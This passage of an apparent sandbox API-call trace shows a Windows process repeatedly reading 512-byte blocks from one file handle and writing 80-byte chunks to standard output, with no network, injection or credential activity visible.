(_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.829] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 
[0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.830] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.831] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.831] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, 
lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] GetFileType (hFile=0x50) returned 0x1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.831] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.832] GetFileType (hFile=0x50) returned 0x1 [0194.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.832] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: 
lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.833] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.833] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.834] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.835] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] 
GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 
[0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.836] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.836] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.837] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.838] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType 
(hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.839] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.839] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.839] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.840] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.840] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 
